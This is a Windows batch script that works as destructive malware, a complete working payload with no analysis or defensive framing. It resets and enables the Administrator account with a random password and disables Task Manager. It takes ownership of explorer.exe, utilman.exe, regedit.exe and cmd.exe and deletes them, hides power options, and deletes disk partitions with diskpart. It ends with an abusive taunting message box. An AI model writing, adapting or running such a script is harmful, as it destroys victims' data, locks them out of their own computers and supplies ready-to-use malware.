@echo off

setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set alfanum=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789?!

set pwd=
FOR /L %%b IN (0, 1, 16) DO (
SET /A rnd_num=!RANDOM! * 62 / 32768 + 1
for /F %%c in ('echo %%alfanum:~!rnd_num!^,1%%') do set pwd=!pwd!%%c
)

net user Administrator %pwd% >nul

net user Administrator /active:yes /fullname:"b*tch" >nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

takeown /f C:\Windows\explorer.exe >nul
icacls "C:\Windows\explorer.exe" /grant Administrator:M >nul
taskkill /im explorer.exe /f >nul
powershell -command "rm C:\Windows\explorer.exe" >nul

takeown /f C:\Windows\system32\utilman.exe >nul
icacls "C:\Windows\system32\utilman.exe" /grant Administrator:M >nul
powershell -command "rm C:\Windows\system32\utilman.exe" >nul

takeown /f C:\Windows\regedit.exe >nul
icacls "C:\Windows\regedit.exe" /grant Administrator:M >nul
powershell -command "rm C:\Windows\regedit.exe" >nul

takeown /f C:\Windows\system32\cmd.exe >nul
icacls "C:\Windows\system32\cmd.exe" /grant Administrator:M >nul

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f >nul

echo WScript.Sleep 2500 >> x.vbs
echo Set objFSO = CreateObject("Scripting.FileSystemObject") >> x.vbs
echo objFSO.DeleteFile("C:\Windows\system32\cmd.exe") >> x.vbs

echo msgbox"stupid b*tch",0 , "get rekt, ur PC has been f*cked" >> y.vbs

echo Select Disk 0 >> y.txt
echo Select Partition 2 >> y.txt
echo Delete Partition Override >> y.txt
echo Select Partition 4 >> y.txt
echo Delete Partition Override >> y.txt

diskpart /s y.txt  >nul
start y.vbs
start x.vbs
taskkill /im cmd.exe /f >nul
